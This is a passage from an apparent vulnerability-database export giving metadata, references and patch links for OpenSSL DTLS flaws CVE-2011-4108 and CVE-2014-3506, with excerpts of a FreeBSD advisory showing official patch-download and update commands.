"id": "110482", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109053", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109614", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169679", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-057" }, { "db": "NVD", "id": "CVE-2011-4108" } ] }, "id": "VAR-201201-0169", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4440100783333334 }, "last_update_date": "2024-06-17T11:44:02.037000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.0f", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42348" }, { "title": "openssl-0.9.8s", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=42347" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120059 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120060 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: CVE-2011-4354: OpenSSL 0.9.8g (32-bit builds) bug leaks ECC private keys", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ea25fd33228ddfe870d0eb9177265369" }, { "title": "Debian Security Advisories: DSA-2390-1 openssl -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e583d2cd94d02b09eb008edba3c25e28" }, { "title": "Debian CVElist Bug Report Logs: Potential DTLS crasher bug", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=42b9da1ce27bbcacbdb9142890b6ad6b" }, { "title": "Amazon Linux AMI: ALAS-2012-038", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-038" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "CNNVD", "id": "CNNVD-201201-057" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4108" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 1.4, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 1.2, "url": "http://www.isg.rhul.ac.uk/~kp/dtls.pdf" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:006" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:007" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00018.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00017.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/48528" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=134039053214295\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=132750648501816\u0026w=2" }, { "trust": 1.1, "url": "http://www.debian.org/security/2012/dsa-2390" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-november/092905.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00001.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57260" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57353" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=133951357207000\u0026w=2" }, { "trust": 1.1, "url": "https://security.paloaltonetworks.com/cve-2011-4108" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4619.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4108.html" }, { "trust": 0.3, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4576.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2333" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4109.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2333.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-2110.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0884.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1165.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2012:0059" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1357-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4325" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4110" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4128" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3363" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5029" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2496" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2761" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5064" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4180" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1089" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2699" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4252" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4609" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4132" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4324" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2484" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.0.0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4577" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4576" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0027" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0050" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201203-12.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4109" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4108" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=1.0.2" }, { "trust": 0.1, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-4577.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0059.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3210" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1357-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1945" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0027" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4108" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4576" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4619" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4109" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "https://www.isg.rhul.ac.uk)" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-057" }, { "db": "NVD", "id": "CVE-2011-4108" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116124" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-057" }, { "db": "NVD", "id": "CVE-2011-4108" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2011-4108" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-09-01T00:00:25", "db": "PACKETSTORM", "id": "116124" }, { "date": "2012-09-25T00:15:41", "db": "PACKETSTORM", "id": "116826" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-03-06T23:57:33", "db": "PACKETSTORM", "id": "110482" }, { "date": "2012-09-25T00:15:29", "db": "PACKETSTORM", "id": "116825" }, { "date": "2012-01-24T23:58:58", "db": "PACKETSTORM", "id": "109053" }, { "date": "2012-02-10T07:44:13", "db": "PACKETSTORM", "id": "109614" }, { "date": "2012-01-17T01:20:23", "db": "PACKETSTORM", "id": "108735" }, { "date": "2012-01-04T12:12:12", "db": "PACKETSTORM", "id": "169679" }, { "date": "2012-01-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-057" }, { "date": "2012-01-06T01:55:00.783000", "db": "NVD", "id": "CVE-2011-4108" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2016-08-23T00:00:00", "db": "VULMON", "id": "CVE-2011-4108" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-057" }, { "date": "2016-08-23T02:04:34.680000", "db": "NVD", "id": "CVE-2011-4108" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "CNNVD", "id": "CNNVD-201201-057" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201201-057" } ], "trust": 0.6 } }
var-201408-0095
Vulnerability from variot
d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via crafted DTLS handshake messages that trigger memory allocations corresponding to large length values. OpenSSL is prone to a denial-of-service vulnerability. Attackers may exploit this issue to consume large amounts of memory, resulting in a denial-of-service condition. The following versions are vulnerable: OpenSSL 0.9.8 versions prior to 0.9.8zb. OpenSSL 1.0.0 versions prior to 1.0.0n. OpenSSL 1.0.1 versions prior to 1.0.1i. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. Corrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE) 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8) 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE) 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1) 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11) 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18) 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE) 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15) CVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510, CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-5139]
III. Additionally, a remote attacker may be able to run arbitrary code on a vulnerable system if the application has been set up for SRP.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 9.3]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 9.2, 9.1, 8.4]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
3) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r269687 releng/8.4/ r271305 stable/9/ r269687 releng/9.1/ r271305 releng/9.2/ r271305 releng/9.3/ r271305 stable/10/ r269686 releng/10.0/ r271304
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII.
Detailed descriptions of the vulnerabilities can be found at: https://www.openssl.org/news/secadv_20140806.txt
It's important that you upgrade the libssl1.0.0 package and not just the openssl package. Alternatively, you may reboot your system.
For the testing distribution (jessie), these problems will be fixed soon.
